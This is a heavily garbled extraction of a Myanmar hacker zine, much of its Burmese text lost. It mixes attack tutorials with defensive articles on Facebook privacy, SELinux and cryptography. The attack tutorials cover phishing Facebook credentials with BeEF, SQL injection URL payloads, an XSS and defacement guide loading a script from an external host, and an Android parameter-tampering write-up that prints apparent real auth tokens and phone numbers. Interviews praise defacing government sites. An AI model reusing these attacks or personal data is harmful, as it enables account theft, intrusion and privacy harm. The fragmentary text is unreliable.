- Att H P St H V T t
။
- H V St ႔ ႔ ႔ Government
Website ၊ C W t ၊M W t ။
- Political Reason ႔ ႔
႔ Cyber War ။C I t ႔ ။P t D t
၊ ၊M t D t ။C D t ။ ။
Cyber War ႔ ။ ၐ
႔ ႔ Cyber Espionage Network : GhostNet ... Remote Administration Tool
(RAT) BotNet ...Canadian Report GhostNet Web Cam / Microphone
႔ Network Infected Computer ႔ device Operate
။ Download ။Computer
Full Access ႔ ။၂ ၉ March ႔။
႔ ႔ ႔ Email ၐ ။
meeting ႔
႔ meeting ႔ Warning
။ R
GhostNet ။
၁ Military / Government / Commercial
C t ၁၃
႔ ။
၁ ၃ ၁၃ D t
။C ႔ ။
…… Att Access ။
Cambridge Report ႔ Attacker U Spam Mail ႔ ႔
Attachment Download Netwok ႔ ။
႔ C ႔ ႔
႔ Bureau 121 ၊ Unit 121 ႔ ႔ North Korea Cyber Warfare Agency
၁၉၉၈ ႔ ႔ ။၂ ၁၁ ႔ ဏ S C
Power By Union Of Underground Myanmar Hackers
122 | P a g e UG MAGAZINE VOL 2 Produced By MBH
႔ ႔ ။
႔ ႔ ။
႔ ႔ ႔ ႔
႔ ႔ ႔ ႔ ။
။ ၂၁ C W C C ႔ ။
၂ ၇ ၂ ၉ ႔ Joint Strike Fighter F35
Lightning 2 ႔ ႔ ႔ file / data /
႔ ။ ႔ H Air Force's air traffic control
systems ႔ ႔
၇ ႔ ႔ Company ။
႔ ၐ ၃ ႔ ။ ႔
႔ Military ႔ USCyberCom ႔ ႔ ။ ႔
T ႔ Attack ႔ ႔
။ ႔ Washington CNN
႔ ႔ ႔ ။
၂၁ ႔ ႔ Computer ႔ Network ၐ ။
႔ N t I t t O
Real Life ၊
။ ႔ ။ ႔
Cyber War | Warfare in the Cyber Space ။ ။Laptop
႔ ႔ ႔ ႔ ႔ ႔ Laptop ႔
။ ႔ ႔ ႔ ႔ Cyber
A ။ C
A ႔ O ၐ ။Cyber Field
I t W P W
႔ ။
႔ C W ႔ Cyber Terrorism ၊
Cyber Espionage ႔
။ ။ ၐ
႔ ႔ C W ။ Cyber ႔
။ C Att ႔ ႔ Cyber Defence
။ ႔ Cyber War ၊ Cyber War
႔ ႔ ႔
။ ။
facebook account
TaikKyi Thar
Facebook Hacking ။ ႔
Facebook Social Network
Internet facebook hacking ။
Facebook socail network ။
personal
႔ ။
။
။ skill ႔ Social
Engineering ႔ ႔ ။ ။
1. Open BeEF
http://127.0.0.1:300/ui/panel
t ‗H ‘ User
Browser ႔ ။ ႔ javascript code link user click
Browser ။local network Man In The Middle Attack
VPS ၐ BeEF install hack ႔ t
႔ ။ ႔ skill
။ ႔ ။Kali Linux ႔ ။ Kali
linux local ip ႔ ifconfig ႔ ။B ―G tt ‖
။
IP 192.168.1.101 ။ ip ။
႔ javascript code webpage ႔ ။ ႔ Kali Linux
apach t ။ js code
webpage
။
SE ။
t t t email,password
႔ BeEF panel ။
facebook ။
႔ ?
3. Trusted Contacts on ။
႔ ႔ password
။F t ။
remove ။
TaikKyi Thar
Sql injection ။ ႔
t t ႔ ႔ ။
sql injection ။
Sql Injection ။ ႔
။ ။
Sql Injection ။
။
Err / 83 (‘) ။
http://site.com/urunler.php?id=83‘
HATA : You have an error in your SQL syntax; check the manual that corresponds to your
MySQL server version for the right syntax to use near '\'' at line 1
E ။Error
။
Vul column ။
Source ။ ။
Routed Quey
http://site.com/urunler.php
C 1 ' H
1‘=0 3127
http://site.com/urunler.php
Err :P column
http://site.com/urunler.php
1 order by 1=0x31206f726465722062792031
http://site.com/urunler.php
Err ၂ ။ Order by 10 ။
http://site.com/urunler.php
http://site.com/urunler.php
http://site.com/urunler.php
U ‘11‘ ၁
http://site.com/urunler.php
http://site.com/urunler.php
V C ။ title ။
http://site.com/urunler.php
http://site.com/urunler.php
Version ။
http:// site.com/urunler.php
http:// site.com/urunler.php
DiOs
http:// site.com/urunler.php
http://site.com/urunler.php
IG t t…H I t …… ။။။ S t
။
။ Union Select Union
Select Union Select ။S S t
။ Union base ။
။Injection
႔ ။ ။
By webkitz
What is CSRF?
- victim transfer ၊
- change
-administrative account ၊
-admin . / ၊
- t t tt ၊
- t t / ၊
. attacker t t t . user
t . html web link social engineering . ။
Eg. www.attackerwebsite.com/winmoney.html
CSRF attack ။
႔ CSRF attack google ႔ ။
Knowledge ႔ HTTP t ၊ ,
. POST,GET R t t ႔
။
Webkitz(msf)
Demo ႔ Gov.bd ။
S I t ။
၂။ ႔ ႔ Hosting ။ Shell
။ https://pastebin.com/H45d88BJ C yourname.js ႔ S upload
႔ ။ www.yourshellsite.com/yourname.js URL XSS Alert
။
<script src="http://www.mmsecurity.net/eval.js"></script>
႔။ ႔ eval.js ။
ၐ submit ။
၃။ Shell Folder
။ Folder deface.html Upload ။www.example.com/Folder/yourdeface.html
Deface Page ႔ https://pastebin.com/76Cmxjwg Edit
Defacement ။ Photo
။
<script src="www.example.com/Folder/yourname.js"></script>
Processing... The file olo.js has been uploaded.Your javascript link will be sent to
donthackme@gmail.com in 5 minutes...If you have trouble to find the email, just check in bulk
folder ၐ ။
gmail ။ G Recovery ႔ ။
mail ႔ XSS Deface Script
။
http://jdstiles.com/java/cct.html
mr.Gh0st N@0b
Table of Contents
Introduction
Introduction
႔ M P ႔ ။M P
႔ M A ။ Android ၊ IOS
၊ Windows Operating System ၐ ။ ႔ Android
Develop A A develop
႔ ။ App Sec ႔ Android App Sec
႔ ။ UG Mangazine ႔
႔ Android App Sec ႔ ။
။ ႔
႔ ႔ ။
။ ၊ Android app ႔ Java ႔
၊ C Native code ႔ ၊ ။
႔ Android App Security
၊ Web App Sec PHP ႔ ။
Online php ႔ W A jsp , asp.net ႔
႔ ၊ PHP Security ႔
႔ ။ Android App Sec A
D ႔ ။
Android App ၊ Android
၊ JVM ၊ Dalvik Machine ႔
။ ႔ ။
Android Architecture ၊ A ၊
App
။
app ။ App
။ App Web Server
႔ Request Intercept (Request )
။ Intercept Burp Suite Community Edition ။ ( Intercept
Portswigger Official Documentation -
Power By Union Of Underground Myanmar Hackers
151 | P a g e UG MAGAZINE VOL 2 Produced By MBH
https://support.portswigger.net/customer/portal/articles/1841101-configuring-an-android-
device-to-work-with-burp ) Intercept App User
ID Web Server Request ။
www.example.com/api/v3/users/175979?app_token=qnoykn5db1E1qxd3jma2&auth_token=2
7bgAMznQHJUQyz4pQfQ&device=A176D63A805D21A819D2F1504B14968327E73A42
Response ။
{"id":175979,"name":"may23","dob":0,"city":" ","township":"","points":0,"phone":"9
597 52632 "," ":""," t ":" ","username":"may23","downloads_count":0,"create
d_at":1495659196,"updated_at":1501535085,"subscription_is_active":false}
I D t O t R ။ ႔
U ID ID ။ P t
Re t Parameter Tampering Parameter Manipulation ႔
ၐ ။
www.example.com/api/v3/users/another_value?app_token=qnoykn5db1E1qxd3jma2&auth_to
ken=27bgAMznQHJUQyz4pQfQ&device=A176D63A805D21A819D2F1504B14968327E73A42
Parameter Val
is_premium=true Premium User Acc ။
။( ၊ App )
{"id":180005,"name":"somename","dob":406747800,"city":" ","township":"","points
":610," ":"9599750 0 "," ":""," t ":" ","username":"someusername","do
wnloads_count":25,"created_at":1499016608,"updated_at":1501535454,"subscription_is_activ
e":false}
A P ။ Vulnerability ႔
႔ ႔ ။ /data/data/package_name/shared_prefs/
user.xml U D t XML ။ ADB (
Android Debug Bridge ) xml file ။ ( ADB -
http://adbshell.com/ ) ၊ Android P Root User Access
။ XML file ။
<map>
<string name="phone">9597xx2632xx</string>
<string
name="state">ßÇÉßÇ¡ßÇ»ßÇäßÇ╣ßÇ©/ßÇ╗ßÇòßÇèßÇ╣ßÇößÇÜßÇ╣ßÇ▒ßÇøßÇ╝ßÇ©ßÇòßǽ</string
>
<string name="operator"></string>
<string name="city">ßü┐ßÇÖßÇ¡ßÇ│ßéòßÇößÇÜßÇ╣ßÇ▒ßÇøßÇ╝ßÇ©ßÇòßǽ</string>
<string name="country">ျမန္မာ</string>
<string name="loaded">true</string>
<string name="username">may23</string>
<string name="authentication_token">27bgAMznQHJUQyz4pQfQ</string>
<string name="email"></string>
<string name="name">may23</string>
<string name="dob">0</string>
<string name="gender"></string>
</map>
<map>
<string name="phone">9599750xx0xx</string>
<string name="state"></string>
<string name="operator">blueocean</string>
<string name="country"></string>
<string name="city"></string>
<string name="loaded">true</string>
<string name="username">someusername</string>
<string name="authentication_token">zZmy8xwg9zxiceJu_sVf</string>
<string name="email"></string>
<string name="name">somename</string>
<string name="dob">406747800</string>
<string name="gender"></string>
</map>
။ L ။ Login App
Web Server User ID Request ။ J
။ Login ႔
။
A A Androidmanifest.xml file ။ t t
content provide ။
File ။L A t t ။
Login
Final Result
ၐ acc U ID change
။
POC
POC
Thin Ba Shane
Cryptography ႔ -->
(Hknudxnt) English … ႔ ။ ႔
။ – ။
႔ ၐ ။
႔ ၐ
။ ႔
႔ ။
။ ။ ႔ ။
...။ ႔ ။ ႔ ႔
။ ႔ ႔
။ ၍ ႔
႔ ။
႔ -hknudxnt ။
… ...။ ။
။ - D E ႔ ။ Y Z ႔ ။
>
h---->i
k---->l
n---->o
u---->v
d---->e
x---->y
n---->o
t---->u
1. Plaintext
ၐ iloveyou -
2. Algorithm
iloveyou hknudxnt ႔ ။( - I, l
) Operation ႔ ၐ operation ႔ ႔
Algorithm ႔ ၐ ။
3. Ciphertext
4. Encryption
5. Decryption
႔ ။
… Encryption ၊ ၊ …
။ ႔
။ ၒ
။ ႔ ႔ Cryptography ႔ ၊
။ ။ ႔
။ ႔ C t ။ ႔
။ ႔ ။ ။ ႔
။ ။ Key ႔ ၐ ။
႔ t ႔ ။
Key ၊ ႔ ။ Key
၊ ။ iloveyou ႔
။ ႔ key
။
Key 5 ။ 10 ၊3
။ ႔ key ႔ ၊ ။
… ။ encryption ။
Symmetric Encryption ...။
1. Symmetric Encryption
။ ၐ ။ ႔
encrypt ( ) Key ႔ ႔ ။
႔ Key
႔ ။ ။
။ ။ ။
2. Asymmetric Encryption
႔ ။ Key
။ Key Public key ။ Public key ႔
Encrypt ႔ ။ Private key - Private key Public Key ႔ encrypt
။ ။
- ။ ႔ ႔ Public key
။( browser ) ၍ ႔ Credit card detail
browser Public key C t t
encrypt ။ ႔ Private key
။ … …
Encryption Encrypt ? … ။
Encrypt ။
။ Custom key ႔ Encrypt ႔ ။
VPN ( ) SSL ႔
Secure Sockts Layer။ Encryption Cryptography
။
( … ႔ ႔ ။ ၐ
။ Decrypt ႔
…
D // D ‘t Security
By Sai Yar
https://www.saiyar.net
D D ‘t
D D ‘t
။
Security 2008 ။
2007
Google Talk Recover keylogger Internet Saved
Password & Log
Hard Core ။ (
2011 Root Creater
။ Hacking
။ hacker
။ Security Researcher Bug
Bountry ။
။
Exploit ။ Zero Days physical phishing social networking
Keylogging and Rat ။ SE ( Not software
engineering ) SE
Art of SE ။
B t ။ Cybe W
DDos
။ ။ t t
။ counter ။ server dos
B t N t ။
Dr-Rat Hacker Lammer ။
mr-noob
ၐ ။ ႔
။ t victem or zombie ။ ႔
t t ။
။
။
M M ။ ။ 6000 ။
။ ႔
။ ၐ
B t ။
။ Et ။ ။
D t ။
။
Islam ။ Islam W t
။ ။ ။ D ‘t ။
D ‘t t t I ‘t t
။ Data Leak C Leak CW Leak ႔
။ Credit Card, Password,
B A t t t t S t
႔။ H t root R
C t Confirm Phising
။ ။ Save The Children Donate
။ ။ D ‘t ။
M4L ႔
no ethic, no respect, no rule they are just rude ။
Facebook ႔ Facebook
Social Engineering ။Facebook
recovery ၐ ။ Art of
exploit SE ။ ။
Info ။ Card
Generate ။
baby punk ghot ။ :P (
Facebook image header ။
allow ။ scan
။ ႔
။ ။
Generate ID ။
Step 2 Auth ။
encrypt key user
t ID email
encrypt decrypt key ။ t ႔
႔ ႔ ။ :P
။ ။
Confidential Data ႔ ။
969 Challenge ။ Cyber Space
။
။
။
။ gov.mm hosting
။ Hack Cat ၐ
user Webhosting C
႔ ။ Socure
၊ …D ‘t ။
Do
၁- Security ။
၃- Privacy ။
၄- ။
၅- Cyber Space ။ Do
။
D ‘t
၁ - t Leak
၂- t t ။ t, t , , t t …
India t
Data leak ။ bug black market ။ ၐ ၁
။ report ။
။ ethic
။
၄- C W P
။ 2012 2013 2014 C W
႔ ။ ။
။ ။
System Hack
။ Hack Attacker D t ။
။ (
t t t t
Hack Hack Attacker ။ ။ ။
။ error fix ။
D IT ( I am also Developer )
။
Coding S F t U F t ။Attacker
Research
Myanmar Cyber Space E Gov E Commerce
Attacker Ethic Privacy
။ ။
Sai Yar
www.saiyar.net
Contents
0x04 : Achievement
C t ။W S ?
Finding Vulnerabilities
Exploiting Demo
G0tttt it . ^_^
application t t ၊ username t
႔ ။A t t
:P “ ( :P ―
application owner report )
။Application contact mail mail ။
Achievement
ၐ
႔ ႔ ႔ B t
150,000 MMK ^_^ report ။ :P
app ။ / ၊ t
။ IT t
Security Testing / Pentesting ၐ
။ security
Bug Bounty hunting ။
Bounty ။ ၊ ဏ၊ ။
HackerOne Bugcrowd ႔ B B t t W t
t security testing B t ။
Bounty vulnerable
။ report Bounty ။
Happy hacking xD
Facebook Security
၊ facebook
Account ။
။ facebook
recovery
၉
။ (၁) ႔ Account Setting ( -၁)
( -၁)
Account Setting
General
Security and Login
Privacy
Timeline and tagging ။
႔ facebook Password ။
႔ facebook ႔ ။ ၊
႔ ႔
။ ႔ ႔
။ ၊
႔ ၊ ႔
႔ ၊ ၊ ႔ ။
။
( ႔ ။ ဏ
credit t ။
႔ ႔ ။
။
႔ ၊ ႔
႔ ႔ )
႔ ။(
)
Privacy
Privacy ။ ႔
႔ ။
႔ ၊ ႔
႔ ႔
႔ ။ Privacy
႔ ။ Information ႔ Security I t
Security ႔ ။ ( ႔ Hacker
။ Social Enginee -
ring ႔ ၐ SE ႔ ။) Public
႔ ႔ ။ ႔
facebook I ‘t ႔ ID
႔ ။ Privacy ။
။
႔ friend only ႔ ။
P C P t ႔ ။
။ ႔ ။
။
၊ ၐ
။ ။
Who can see the people, Page and lists you follow?
၊ ႔ ႔ ႔ ႔ ( ႔၊
႔ like follow see first ) (
၊ like, follow, see first )
႔ ။ ႔ like, follow ႔
႔ Newsfeed ၐ ။
႔ follow ၊ page follow
။ :-P
Friends Only ႔
။ (
။) ႔
။ ၊ ။
ၐ Screen Shoot ႔ ႔ ။
About SS
။ ။
ၐ
SS ။
SS
႔ ။
recovery ၉ % ႔ ႔ ။
( ၃ ႔ :-D )
႔ ။
Ko Thet Khine
Search engine . ၃ ။
Crawling
Indexing
Searching or Ranking
Crawling
Search ႔ internet
႔ ႔ ။ t t ၐ
save ။Crawler internet ။
။ Crawler internet ။ ႔ pag
download ။ index server ႔ ။
Crawler ။
႔ ။ ႔ crawler t t ၐ
download ။Google Crawler
။ D t t C ။ Distribute Crawler
geographically ။ ႔ download
crawl ။ index server ။
Indexing
Indexing Crawler download ႔ t
။ ႔ ။ ႔ t
႔ ။ a,and,the ႔ t
။ programming, programmer root form program
t t index structure ႔ ။ information
retrieval field inverted index structure ႔ ။
index ။ word
။ I word web page
URL ။ data storage single
M SQL clustering ။
Ranking
႔ ။ Google PageRank Algorithm
။ PageRank ။ Ranking algorithm ။
PageRank income
-ing link ( page . outgoing link (
page link ) ။ Incoming link (
rank ) ။ Ranking
။ rank ။
။ Java Oracle Oracle
rank ။ AI, Machine learning
Google ။ Ranking ႔ S t
relevant ႔ ။ user
rank ။Larry page ႔ paper
ၐ paper title ႔ google ။
Ko Thet Khine
႔P ႔ ။
႔F copy ။
File texteditor ။
႔ t ။
Backdoor ႔ ။
႔ ။
Fr33d0m N00b
MBH ။ ။
UGMH ။ ။
MBH ။ ။ ႔ UGMH ႔ cyber war ။
။
UGMH ။ ။ ႔ UGMH
။ ႔ ႔ ။
MBH ။ ။UGMH T
။ ႔ ။
။
UGMH ။ ။ ႔ Team
႔ ႔ UGMH
။H T ႔ ႔ ။
႔ ႔
Hacker freedom ႔ Team ႔ ႔
။ UGMH
႔
။ T
႔ ။
MBH ။ ။ ၐ ။
႔ UGMH ႔
႔ ႔ ။
Win ႔ Zaw
Operation ႔ ။
MBH ။ ။ UGMH
ၐ ။ R
။
UGMH ။ ။ UGMH Hacking T Team
။ ။
႔ Team ႔ ႔ ႔ ႔ UGMH
။UGMH
cyber space ႔ ။
MBH ။ ။ T ႔ ။
UGMH ။
UGMH ။ ။ Team Lead ႔
။ ႔
။ ႔
။ UGMH group ။
ၑ ၑ ႔
Protocol ။ ၑ ။ ႔
။ Team ။
။
MBH ။ ။ M4L UGMH
။ ။
။
UGMH ။ ။ ။ ႔ ။
႔ UGMH ႔ ။
႔ ။ ႔
။
MBH ။ ။ ႔ ။ ။
။
UGMH ။ ။ ၒ ။ ႔ page message ႔
။
။
။ ႔ ႔
။ ႔
႔ ။ gov.mm
႔ Recovery
။
႔ ႔ Message
႔
။
႔ ႔ ။
MBH ။ ။ cyber war post ႔ ။
႔
႔ ။
UGMH ။ ။ ။ ။ online banking
၉ 48 shutdown
။ ။
႔ bank online bank
။ ႔
။ ဏ
UGMH Member ။
႔ ။ ႔ ၊
။
MBH ။ ။ ။ ဏ ႔ ။။
UGMH ။ ။ ႔ ႔ ။
ဏ ဏ
။
႔
႔ ။
MBH ။ ။ ။
။
UGMH ။ ။ UGMH ။ ႔M ။
( ။ )
။ ။ ။ No lock is safe ။
Deface
Attacking Method Tools ႔ Version
႔ ။
S R t ၄
[x] SELinux ၏
S R t ၄
Power ။ Power
႔ ။
3. Loading Kernel
4. Loading OS
၅ ႔ ။
R t E t K V ၐ
။ R t E t
Kernel ႔ ။
ၐ ၅ ။ Web Server
Web Site Hacking Shell E t Upload Execute
Server R t Rooting Exploit ၅ ၃
႔ ။ ၍ Service/Application Level Kernel
Rooting ။ Rooting
Kernel ႔ ။
Read/Write/Execute ႔U /G
Discretionary Access Control ႔ ၐ DAC P ႔ ။ Kernel
R t ႔ ႔ ။
SELinux ၏
႔ Allow Reject
Access Vector Cache ႔ ၐ Log ။ ၍
SELinux ႔ Security Policy ႔
A t -R t D tR t ။
W t Web Applicat F St t
႔ ။ Path W t
Path Write Access ။ ႔
Developer Website/WebApp
။ Wordpress F
St t ၐ SEL file path ။
T Configure P
Wordpress Website H P T
Fi St t ၍ 404.php ႔ function.php
႔ Shell ။ ႔ wordpress file edit
- t t themes ႔ plugin folder ႔ ၄ ႔
file Apache Read Access Write Access ။ ႔
SELinux Type Label " tt t t t‖ ။
- t t uploads folder ။W U
P t
။ ၄ F Apache Write Access ( SELinux Type Label: httpd_sys
_rw_content_t ) ။ ႔ ၄ Shell ။
႔ W -S ClamAV ႔ Anti-
Virus ႔ S ။
႔ ―B / ?‖
User SEL
SELinux ႔"
"―
"― ႔ SELinux ။ " ႔ SELinux
။ MAC P
႔ ။
SELinux ႔ SELinux
၊ Defensive
Security SELinux ၊ Defensive Security
႔ SELinux ႔
။
။ Magazine
UGMH ႔ MBH ။ ႔
႔ ။
႔ ။ ႔
႔ ။
။
။
Facebook page ႔ ။ ။
႔ ႔ ။
( )
၊ ႔
႔ ။
႔ ႔ ၊
။
႔ MBH UGMH
။
႔
။
UG Magazine Team